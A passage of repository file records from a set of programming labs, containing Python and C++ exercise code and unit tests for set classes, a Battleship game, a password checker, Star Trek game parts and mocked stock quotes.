"text": "class Set(object):\n \n def __init__(self):\n self.storage = []\n \n def is_empty(self):\n if self.storage:\n return False\n else:\n return True\n \n def append(self, item):\n if isinstance(item, list):\n for i in item:\n self.storage.append(i)\n else:\n self.storage.append(item)\n \n def __iter__(self):\n if not self.storage:\n raise StopIteration\n for item in self.storage:\n yield item\n \n def __contains__(self, item):\n if item in self.storage:\n return True\n \n def __eq__(self, other_list):\n if len(self.storage) != len(other_list):\n return False\n for i in range(len(other_list)):\n if other_list[i] not in self.storage:\n return False\n return True\n #return set(self.storage) == set(other_list)\n \n def __ne__(self, other_list):\n return not self.__eq__(other_list)\n \n def __len__(self):\n return len(self.storage)\n \n def __getitem__(self, index):\n return self.storage[index]\n \n def __repr__(self):\n return '<Set: {}>'.format(str(self.storage))\n "
},
{
"alpha_fraction": 0.5434831976890564,
"alphanum_fraction": 0.5555809140205383,
"avg_line_length": 27.828947067260742,
"blob_id": "b8435d2bd73fee9740dfa4b00d1204751a6a5610",
"content_id": "5b6489942965b1a9404be38ef043ed9cab95d910",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4381,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 152,
"path": "/battleship/tests.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import game\nimport playermap\nimport player\nimport ship\n\nimport unittest\n\nSHIPS = {'Aircraft carrier': 5,\n 'Battleship': 4,\n 'Cruiser': 3,\n 'Destroyer': 2,\n 'Submarine': 1\n }\n\nclass TestSingleShip(unittest.TestCase):\n \n def test_number_of_ship_types(self):\n s = ship.Ship('Battleship')\n self.assertEqual(len(s.ships), len(SHIPS))\n \n def test_cannot_add_new_ship(self):\n with self.assertRaises(ship.InvalidBoat):\n ship.Ship('U-boat')\n \n def test_ship_create(self):\n for boat in SHIPS:\n s = ship.Ship(boat)\n self.assertEqual(SHIPS[boat], s.ships[boat])\n \n def test_ship_initial_damage(self):\n for boat in SHIPS:\n s = ship.Ship(boat)\n self.assertEqual(s.hit_count, 0)\n \n def test_ship_take_damage(self):\n for boat in SHIPS:\n s = ship.Ship(boat)\n s.it_hit()\n self.assertEqual(s.hit_count, 1)\n \n def test_ship_destroy_submarine(self):\n s = ship.Ship('Submarine')\n s.it_hit()\n self.assertTrue(s.isDestroyed())\n \n def test_ship_destroy_battleship(self):\n s = ship.Ship('Battleship')\n for cnt in range(s.ships['Battleship']):\n s.it_hit()\n self.assertTrue(s.isDestroyed())\n\n \nclass TestMap(unittest.TestCase):\n \n def test_map_correct_size(self):\n m = playermap.Map()\n self.assertEqual(m.size, 10)\n \n def test_map_location_valid(self):\n m = playermap.Map()\n self.assertTrue(m.valid(1,1))\n\n def test_map_is_attack(self):\n m = playermap.Map()\n m.attack(1,1)\n self.assertTrue(m.isHit(1,1))\n \n def test_map_attack_out_of_bounds(self):\n m = playermap.Map()\n with self.assertRaises(playermap.OutOfBounds):\n m.attack(11,11)\n \n def test_map_unattacked_not_hit(self):\n m = playermap.Map()\n self.assertFalse(m.isHit(1,1))\n \n \nclass TestPlayer(unittest.TestCase):\n \n def test_valid_ship_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n self.assertTrue(p.check_location(s, direction, 1, 2))\n \n def test_invalid_ship_start_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n self.assertFalse(p.check_location(s, direction, 100, 100))\n \n def test_invalid_ship_end_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n self.assertFalse(p.check_location(s, direction, 10, 10))\n \n def test_valid_first_ship_placement(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n p.place_ship(s, direction, 1, 1)\n self.assertIn((1,1), m.ship_locations)\n \n def test_overlapping_ship_placement(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Destroyer')\n direction = 'H'\n \n p.place_ship(s, direction, 1, 1)\n self.assertFalse(p.check_location(s, direction, 1, 1))\n \n def test_attack_occupied_location(self):\n m = playermap.Map()\n p = player.Player(m)\n s = ship.Ship('Submarine')\n direction = 'H'\n \n p.place_ship(s, direction, 1, 1)\n self.assertTrue(p.attack(1, 1))\n \nclass TestGame(unittest.TestCase):\n \n def test_game_board_size(self):\n g = game.Game()\n self.assertEqual(g.board_size, 10)\n \n def test_game_number_players(self):\n g = game.Game()\n self.assertEqual(g.number_players, 2)\n \n def test_valid_ship_list(self):\n g = game.Game()\n ships = g.generate_ship_list()\n ship_types = [boat.type for boat in ships]\n self.assertEqual(1, ship_types.count('Aircraft carrier'))\n self.assertEqual(1, ship_types.count('Battleship'))\n self.assertEqual(1, ship_types.count('Cruiser'))\n self.assertEqual(2, 
ship_types.count('Destroyer'))\n self.assertEqual(2, ship_types.count('Submarine'))\n \nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.5588382482528687,
"alphanum_fraction": 0.5683525204658508,
"avg_line_length": 31.225807189941406,
"blob_id": "6d6c724bfb6a58700379e17892e371129ec448f7",
"content_id": "0b80648e145bd368a7bc43e153ebc57b443d7df6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1997,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 62,
"path": "/password_tester/password_test.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import password\n\nimport unittest\n\nclass TestPassword(unittest.TestCase):\n \n def test_greater_than_seven(self):\n pw = '123'\n \n self.assertIn('TooShortException', password.check(pw))\n \n def test_admin_greater_than_ten(self):\n pw = '12345678'\n \n self.assertIn('AdminTooShortException', password.check(pw, admin=True) )\n \n def test_contain_no_alphabet_char(self):\n pw = '12345678'\n \n self.assertIn('NoAlphabeticException', password.check(pw))\n \n def test_contain_no_digit(self):\n pw = 'abcdefgh'\n \n self.assertIn('NoDigitException', password.check(pw))\n \n def test_valid_password(self):\n pw = 'abcdefg7'\n \n self.assertEqual( set(), password.check( pw ) )\n \n def test_admin_does_not_contain_special(self):\n pw = 'abc123def456'\n \n self.assertIn('AdminNoSpecialCharacterException', password.check(pw, admin=True))\n \n def test_admin_last_char_is_not_special(self):\n pw = 'abc!23def45a'\n \n self.assertIn('AdminLastCharacterIsNotSpecialOrNumber', password.check(pw, admin=True))\n \n def test_valid_admin_password(self):\n pw = 'abc123def456!'\n \n self.assertEqual(set(), password.check(pw, admin=True))\n \n def test_all_errors(self):\n pw = ''\n \n self.assertEqual(set(['TooShortException', 'NoAlphabeticException', 'NoDigitException']),\n password.check(pw))\n \n def test_all_admin_errors(self):\n pw = ''\n \n self.assertEqual(set(['AdminTooShortException', 'TooShortException', 'NoAlphabeticException', \n 'NoDigitException', 'AdminNoSpecialCharacterException', \n 'AdminLastCharacterIsNotSpecialOrNumber']),\n password.check(pw, admin=True))\n \nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.6282722353935242,
"alphanum_fraction": 0.6623036861419678,
"avg_line_length": 13.148148536682129,
"blob_id": "cdb0b90ad8a88c9d4960867163fb8f7a582c6079",
"content_id": "d6d11383ba7a70575b2a097074580a2bea2e268b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 382,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 27,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Phaser.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"Phaser.h\"\n\n#include <algorithm>\n\n#include \"RandGenerator.h\"\n\nnamespace StarTrek\n{\nPhaser::Phaser()\n{\n}\n\nPhaser::~Phaser()\n{\n}\n\nbool Phaser::arePhasersInRange( int distance )\n{\n return distance <= 4000;\n}\n\nint Phaser::getPhaserDamage( int amount, int distance )\n{\n return std::max( 1, amount - (((amount /20)* distance /200) + rnd(200)) );\n}\n\n} // namespace StarTrek\n"
},
{
"alpha_fraction": 0.5057142972946167,
"alphanum_fraction": 0.5142857432365417,
"avg_line_length": 27.040000915527344,
"blob_id": "883ab050c59f37ca1bab9cd7dd0834a560e76aa8",
"content_id": "fbd910460d8bcd437669c813cae5d9c5d8ebf1b6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 700,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 25,
"path": "/battleship/playermap.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class OutOfBounds(Exception):\n pass\n\nclass Map:\n def __init__(self):\n self.size = 10\n self.hit_locations = {}\n self.ship_locations = {}\n \n def valid(self, x, y):\n return x in range(1, self.size+1) and \\\n y in range(1, self.size+1) \n \n def valid_ship_position(self, x, y):\n return self.valid(x, y) and \\\n (x, y) not in self.ship_locations\n \n def attack(self, x, y):\n if not self.valid(x, y): \n raise OutOfBounds\n if (x, y) not in self.hit_locations:\n self.hit_locations[(x, y)] = True\n \n def isHit(self, x, y):\n return self.hit_locations.get((x, y), False);"
},
{
"alpha_fraction": 0.6850393414497375,
"alphanum_fraction": 0.6850393414497375,
"avg_line_length": 11.699999809265137,
"blob_id": "38d2b0c1fefa39acf7f79821760e0d68b9e58de9",
"content_id": "b5c39b11bc654bf3331fcc324c31acb42dc126dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 254,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 20,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Phaser.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef PHASER_HEADER\n#define PHASER_HEADER\n\nnamespace StarTrek\n{\n\nclass Phaser\n{\npublic:\n Phaser();\n ~Phaser();\n\n bool arePhasersInRange( int distance );\n int getPhaserDamage( int amount, int distance );\n\n};\n\n} // namespace StarTrek\n\n#endif\n"
},
{
"alpha_fraction": 0.5084337592124939,
"alphanum_fraction": 0.5293172597885132,
"avg_line_length": 25.510639190673828,
"blob_id": "c41259861b8e83d58b2259d1347a124b7b17d9fe",
"content_id": "19b6774d72e0391f2440abd99b19b13df8b88bcf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1245,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 47,
"path": "/pyset/test.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import pyset\n\nimport copy\nimport unittest\n\nclass TestSet(unittest.TestCase):\n \n def test_is_empty(self):\n my_set = pyset.Set()\n self.assertEqual(True, my_set.is_empty())\n \n def test_append(self):\n my_set = pyset.Set()\n my_set.append( 5 )\n self.assertIn( 5, my_set )\n \n def test_equals(self):\n new_list = [1, 2, 3]\n my_set = pyset.Set()\n my_set.append([1, 2, 3])\n self.assertEqual(new_list, my_set)\n self.assertEqual(my_set, my_set)\n \n def test_notequal(self):\n new_list = [1, 2, 3]\n my_set = pyset.Set()\n my_set.append([3,4,5])\n self.assertNotEqual(new_list, my_set)\n \n def test_reverse_is_equal(self):\n new_list = [1,2,3]\n reversed_list = copy.deepcopy(new_list)\n reversed_list.reverse()\n my_set = pyset.Set()\n my_set.append(reversed_list)\n self.assertEqual(new_list, my_set)\n \n def test_you_are_not_cheating(self):\n new_list = [1, 2, 3]\n my_set = pyset.Set()\n my_set.append( new_list )\n big_list = [1, 1, 2, 2, 3, 3]\n self.assertNotEqual(big_list, my_set)\n \n \nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.457109272480011,
"alphanum_fraction": 0.4653348922729492,
"avg_line_length": 29.428571701049805,
"blob_id": "b90916d2ec63e331fe9e0df78bf2fd379fdd201a",
"content_id": "7afdcbeebefed82e8b15b2bba3faf6f771725ed3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 851,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 28,
"path": "/battleship/ship.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class InvalidBoat(Exception):\n pass\n\nclass Ship:\n def __init__(self, ship_type):\n self.type = ship_type\n self.ships = {'Aircraft carrier': 5,\n 'Battleship': 4,\n 'Cruiser': 3,\n 'Destroyer': 2,\n 'Submarine': 1,\n }\n \n if ship_type not in self.ships:\n raise InvalidBoat(\n '\"{}\" is an invalid ship type!'.format(ship_type))\n \n self.size = self.ships[self.type]\n self.hit_count = 0\n \n def it_hit(self):\n if not self.isDestroyed():\n self.hit_count += 1\n if self.hit_count == self.size:\n print 'You sunk my {}'.format(self.type)\n \n def isDestroyed(self):\n return self.hit_count == self.ships[self.type]"
},
{
"alpha_fraction": 0.6150306463241577,
"alphanum_fraction": 0.6150306463241577,
"avg_line_length": 15.300000190734863,
"blob_id": "3d608daaae2b8a0e9a9e918bb6a580fc874dd412",
"content_id": "7cdca1f3a0cae0b67e2fce7c6037ab3f6b624f7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 652,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 40,
"path": "/MessTrek/src/StarTrek/Game.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef GAME_HEADER\n#define GAME_HEADER\n\n#include <cstdlib>\n#include <memory>\n#include \"webgadgetproxy.h\"\n\n\nnamespace StarTrek {\n\n\nclass Game {\npublic:\n class RandomGenerator\n {\n public:\n virtual int Get( int maximum )\n {\n return rand() % maximum;\n }\n };\n\nprivate:\n int e_;\n int t_;\n std::unique_ptr<RandomGenerator> gen;\n\n int randomWithinLimitOf(int maximum) {\n return gen->Get( maximum );\n }\n\npublic:\n Game( std::unique_ptr<RandomGenerator> generator =\n std::unique_ptr<RandomGenerator>( new RandomGenerator() ));\n void fireWeapon(WebGadgetProxy& wg);\n};\n\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.6792114973068237,
"alphanum_fraction": 0.6792114973068237,
"avg_line_length": 20.461538314819336,
"blob_id": "c3c684d8e95d13873f700b98685739d1d9c4caee",
"content_id": "0a7bc5963dabdf46eed017bd98b2602bd555e688",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 558,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 26,
"path": "/MessTrek/src/StarTrek/webgadgetproxy.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef WEBGADGETPROXY_H\n#define WEBGADGETPROXY_H\n\n#include \"../Untouchables/WebGadget.h\"\n\nclass WebGadgetProxy{\npublic:\n WebGadgetProxy( Untouchables::WebGadget *wg ) : m_wg( wg ) {}\n\n virtual string parameter(string parameterName) {\n return m_wg->parameter(parameterName);\n }\n\n virtual void* variable(string variableName) {\n return m_wg->variable(variableName);\n }\n\n virtual void writeLine(string message) {\n m_wg->writeLine(message);\n }\n\nprivate:\n Untouchables::WebGadget *m_wg;\n};\n\n#endif // WEBGADGETPROXY_H\n"
},
{
"alpha_fraction": 0.5973932147026062,
"alphanum_fraction": 0.6285300254821777,
"avg_line_length": 22.406780242919922,
"blob_id": "0ef2ed266db8ae48246fd6e051e18e4f2ecfc1d9",
"content_id": "a12cec77e5ec99f61007fcc98bae6cc45cd4c466",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2762,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 118,
"path": "/LunEx/StockQuoteTests/StockQuoteTests.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"../src/LunExServices.h\"\n#include \"../src/stockquote.h\"\n#include \"gtest/gtest.h\"\n#include \"gmock/gmock.h\"\n\nusing ::testing::Return;\n\nclass HandMock : public LunExServices{\npublic:\n HandMock() : transactions( 0 ) {}\n\n double currentPrice( const char* symbol )\n {\n ++transactions;\n return 10.0;\n }\n\n int transactions;\n};\n\nclass GoogleMock : public LunExServices{\npublic:\n MOCK_METHOD1(currentPrice, double(const char* symbol));\n};\n\n\nTEST(StockQuotes, DISABLED_CanConstruct) {\n LunExServices l;\n StockQuote( \"MIKE\", l );\n}\n\nTEST(StockQuotes, DISABLED_ReturnsTotal) {\n LunExServices l;\n StockQuote q( \"MIKE\", l );\n EXPECT_NE( 0, q.Total( 1 ) );\n}\n\nTEST(HandMockTests, GetsCurrentPrice)\n{\n HandMock m;\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(HandMockTests, GetsCurrentPriceMultiShare) {\n HandMock m;\n StockQuote q( \"Steve\", m );\n EXPECT_EQ( 50.0, q.Price( 5.0 ) );\n}\n\nTEST(HandMockTests, GetSameStockQuoteTwice){\n HandMock m;\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(HandMockTests, GetTransactionTotal){\n HandMock m;\n StockQuote q( \"DELL\", m );\n EXPECT_EQ(112.0, q.Total( 10 ));\n}\n\nTEST(HandMockTests, OnlyOneTransaction) {\n HandMock m;\n StockQuote q( \"DELL\", m );\n q.Price( 50 );\n q.Total( 100 );\n EXPECT_EQ(1, m.transactions);\n}\n\nTEST(GoogleMockTests, GetsCurrentPrice)\n{\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"STEVE\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(GoogleMockTests, GetsCurrentPriceMultiShare) {\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"STEVE\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 50.0, q.Price( 5.0 ) );\n}\n\nTEST(GoogleMockTests, GetSameStockQuoteTwice){\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"STEVE\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"STEVE\", m );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n EXPECT_EQ( 10.0, q.Price( 1.0 ) );\n}\n\nTEST(GoogleMockTests, GetTransactionTotal){\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"DELL\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"DELL\", m );\n EXPECT_EQ(112.0, q.Total( 10 ));\n}\n\nTEST(GoogleMockTests, OnlyOneTransaction) {\n\n GoogleMock m;\n EXPECT_CALL(m, currentPrice( ::testing::StrEq(\"DELL\") ) ).WillOnce(Return(10.0));\n StockQuote q( \"DELL\", m );\n q.Price( 50 );\n q.Total( 100 );\n// EXPECT_EQ(1, m.transactions);\n}\n\nint main(int argc, char** argv)\n{\n // run all tests\n ::testing::InitGoogleMock(&argc, argv);\n\n return RUN_ALL_TESTS();\n}\n"
},
{
"alpha_fraction": 0.4885777533054352,
"alphanum_fraction": 0.4922623336315155,
"avg_line_length": 16.397436141967773,
"blob_id": "2b2f45fd190ff2c79f8d52380564c6a55274434b",
"content_id": "b70204523cef532739c3088c6ccc0d84faf8ba01",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1357,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 78,
"path": "/SuperSet/SuperSet/Set.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"Set.h\"\n\nSet::Set(void)\n{\n}\n\n\nSet::~Set(void)\n{\n}\n\nbool Set::isEmpty() const\n{\n return m_storage.empty();\n}\n\nvoid Set::add( unsigned int to_add )\n{\n if ( ( to_add > 0 ) && !contains(to_add) )\n {\n m_storage.push_back( to_add );\n }\n}\n\nbool Set::contains( unsigned int to_check ) const\n{\n for ( unsigned int i = 0; i < m_storage.size(); ++i )\n {\n if ( to_check == m_storage[i] )\n {\n return true;\n }\n }\n return false;\n}\n\nvoid Set::remove( unsigned int to_remove )\n{\n std::vector<unsigned int>::iterator it = m_storage.begin();\n std::vector<unsigned int>::iterator end_it = m_storage.end();\n for (; it != end_it; ++it )\n {\n if ( to_remove == *it )\n {\n m_storage.erase( it );\n return;\n }\n }\n\n}\n\nSet Set::getIntersection( const Set& other )\n{\n Set ret;\n for ( unsigned int i = 0; i < m_storage.size(); ++i )\n {\n if ( other.contains( m_storage[i] ) )\n {\n ret.add( m_storage[i] );\n }\n }\n return ret;\n}\n\nSet Set::getUnion( const Set& other )\n{\n Set ret;\n for ( unsigned int i = 0; i < m_storage.size(); ++i )\n {\n ret.add(m_storage[i]);\n }\n\n for ( unsigned int i = 0; i < other.m_storage.size(); ++i )\n {\n ret.add(other.m_storage[i]);\n }\n return ret;\n}\n"
},
{
"alpha_fraction": 0.7591623067855835,
"alphanum_fraction": 0.7591623067855835,
"avg_line_length": 14.916666984558105,
"blob_id": "dd4c020d5fc509aaf54e14a38032718279959c3e",
"content_id": "1d6d3314ccd65a17d7ef492b8ad2817c28c0adb5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 191,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 12,
"path": "/TestedTrek/TestedTrek/src/StarTrek/RandGenerator.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef RAND_GENERATOR_HEADER\n#define RAND_GENERATOR_HEADER\n\n#include <cstdlib>\n\ntypedef int(*Random)(void);\n\nextern Random generator;\n\nint rnd(int maximum);\n\n#endif // RAND_GENERATOR_HEADER\n"
},
{
"alpha_fraction": 0.5511197447776794,
"alphanum_fraction": 0.552093505859375,
"avg_line_length": 25.30769157409668,
"blob_id": "1c15c36923454b71912f7fa4c795914d09dd8c18",
"content_id": "a275cf51ad7ae4d8c26c02de8e52eeb4a5019a0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1027,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 39,
"path": "/pyset/pysetlist.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class Set(object):\n\n def __init__(self):\n self.internal_list = []\n\n def __contains__(self, item):\n if item in self.internal_list:\n return True\n else:\n return False\n\n def __repr__(self):\n return '<Set {}>'.format(self.internal_list)\n\n def __iter__(self):\n if not self.internal_list:\n raise StopIteration\n for item in self.internal_list:\n yield item\n\n def append(self, item):\n if isinstance(item, int) and item <= 0:\n # don't allow negative numbers to be added\n pass\n elif item not in self.internal_list:\n self.internal_list.append(item)\n\n def count(self, item):\n return self.internal_list.count(item)\n\n def intersection(self, other_list):\n new_list = []\n for item in other_list:\n if item not in self.internal_list:\n self.internal_list.append(item)\n\n\n def remove(self, item):\n self.internal_list.remove(item)\n\n"
},
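With `intersection` corrected above, a quick REPL-style sanity check (the values are hypothetical):

```python
from pysetlist import Set

s = Set()
for n in (1, 2, 3):
    s.append(n)
s.intersection([2, 3, 4])        # keeps only the shared items
assert s.internal_list == [2, 3]
```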
{
"alpha_fraction": 0.572519063949585,
"alphanum_fraction": 0.5782442688941956,
"avg_line_length": 29.235294342041016,
"blob_id": "d598c495fcf19cc7046dd4c41a0a3ec259c488f4",
"content_id": "4cfa06897370cafb7891a9eab8c3d8b9d42ffcd1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 524,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 17,
"path": "/battleship/game.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import ship\n\nclass Game:\n def __init__(self):\n self.board_size = 10\n self.number_players = 2\n \n def generate_ship_list(self):\n ships = []\n ships.append(ship.Ship('Aircraft carrier'))\n ships.append(ship.Ship('Battleship'))\n ships.append(ship.Ship('Cruiser'))\n ships.append(ship.Ship('Destroyer'))\n ships.append(ship.Ship('Destroyer'))\n ships.append(ship.Ship('Submarine'))\n ships.append(ship.Ship('Submarine'))\n return ships\n \n \n"
},
{
"alpha_fraction": 0.5930481553077698,
"alphanum_fraction": 0.6278074979782104,
"avg_line_length": 17.33333396911621,
"blob_id": "481ecac41aed44ed583a6ae284c9ab95a8aa4207",
"content_id": "7a778f20b357b520f71fd3733f92b6f45d85349e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3740,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 204,
"path": "/SuperSet/SetDemo/SetTests.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "// SetTests.cpp : Defines the entry point for the console application.\n//\n\n#include \"gtest/gtest.h\"\n#include <Set.h>\n\nTEST(SuperSet, InitializedEmpty) {\n Set set;\n EXPECT_EQ( true, set.isEmpty() );\n}\n\nTEST(SuperSet, isNotEmpty) {\n Set set;\n set.add(1);\n EXPECT_EQ( false, set.isEmpty() );\n}\n\nTEST(SuperSet, doesNotContainNaturalNumber)\n{\n Set set;\n EXPECT_EQ(false, set.contains(2));\n}\n\nTEST(SuperSet, doesContainNaturalNumber)\n{\n Set set;\n set.add(2);\n EXPECT_EQ(true, set.contains(2));\n}\n\nTEST(SuperSet, stillEmptyAddingZero)\n{\n Set set;\n set.add(0);\n EXPECT_EQ(true, set.isEmpty());\n}\n\nTEST(SuperSet, zeroNotAdded)\n{\n Set set;\n set.add(1);\n set.add(0);\n EXPECT_EQ( false, set.contains(0) );\n}\n\nTEST(SuperSet, removeItem)\n{\n Set set;\n set.add(1);\n set.remove(1);\n EXPECT_EQ( false, set.contains(1) );\n}\n\nTEST(SuperSet, removeNonExistantItem)\n{\n Set set;\n set.add(1);\n set.add(2);\n set.remove(3);\n EXPECT_EQ( true, set.contains(1) );\n EXPECT_EQ( true, set.contains(2) );\n EXPECT_EQ( false, set.contains(3) );\n}\n\nTEST(SuperSet, sameNumberAddedRemovedOnce)\n{\n Set set;\n set.add(1);\n set.add(1);\n set.remove(1);\n EXPECT_EQ( false, set.contains(1) );\n}\n\nTEST(SuperSet, sameNumberAddedThenRemovedAndReadded)\n{\n Set set;\n set.add(1);\n set.add(1);\n set.remove(1);\n set.add(1);\n EXPECT_EQ( true, set.contains(1) );\n}\n\nTEST(SuperSet, emptySetIntersections)\n{\n Set set1;\n Set set2;\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( true, intersection.isEmpty() );\n}\n\nTEST(SuperSet, bothHaveOne)\n{\n Set set1;\n Set set2;\n set1.add(1);\n set2.add(1);\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( true, intersection.contains(1) );\n}\n\nTEST(SuperSet, bothHaveDifferentValues)\n{\n Set set1;\n Set set2;\n set1.add(1);\n set1.add(5);\n set2.add(1);\n set2.add(2);\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( true, intersection.contains(1) );\n EXPECT_EQ( false, intersection.contains(5) );\n}\n\nTEST(SuperSet, reversable)\n{\n Set set1;\n Set set2;\n set1.add(1);\n set1.add(5);\n set2.add(1);\n set2.add(2);\n Set intersection = set1.getIntersection(set2);\n Set intersection2 = set2.getIntersection(set1);\n\n EXPECT_EQ( true, intersection.contains(1) );\n EXPECT_EQ( false, intersection.contains(5) );\n\n EXPECT_EQ( true, intersection2.contains(1) );\n EXPECT_EQ( false, intersection2.contains(5) );\n}\n\nTEST(SuperSet, emptySetWithNonEmpty)\n{\n Set set1;\n Set set2;\n set1.add(1);\n\n Set intersection = set1.getIntersection(set2);\n EXPECT_EQ( false, intersection.contains(1) );\n EXPECT_EQ( true, intersection.isEmpty() );\n}\n\nTEST(SuperSet, emptyUnion)\n{\n Set set1;\n Set set2;\n\n Set union1 = set1.getUnion(set2);\n EXPECT_EQ( true, union1.isEmpty() );\n}\n\nTEST(SuperSet, emptyUnionPlusNonEmpty)\n{\n Set set1;\n Set set2;\n\n set1.add(1);\n\n Set union1 = set1.getUnion(set2);\n EXPECT_EQ( true, union1.contains(1) );\n}\n\nTEST(SuperSet, bothSetsHaveDataUnion)\n{\n Set set1;\n Set set2;\n\n set1.add(1);\n set2.add(2);\n\n Set union1 = set1.getUnion(set2);\n EXPECT_EQ( true, union1.contains(1) );\n EXPECT_EQ( true, union1.contains(2) );\n}\n\nTEST(SuperSet, unionIsReversible)\n{\n Set set1;\n Set set2;\n\n set1.add(2);\n set1.add(7);\n set2.add(10);\n set2.add(11);\n\n Set union_1_to_2 = set1.getUnion(set2);\n Set union_2_to_1 = set2.getUnion(set1);\n\n}\n\n\n/*TEST(SuperSet, InitialSizeIsZero) {\n Set set;\n EXPECT_EQ(0, set.size());\n}*/\n\nint main(int argc, char** argv)\n{\n // 
run all tests\n ::testing::InitGoogleTest(&argc, argv);\n\n return RUN_ALL_TESTS();\n}\n"
},
{
"alpha_fraction": 0.7197231650352478,
"alphanum_fraction": 0.7197231650352478,
"avg_line_length": 14.210526466369629,
"blob_id": "d0466c6b6d1b0e66c6fa6ee38a775f8a362e50af",
"content_id": "305b9590ece656fd61accdb6613746a4b255bb89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 289,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 19,
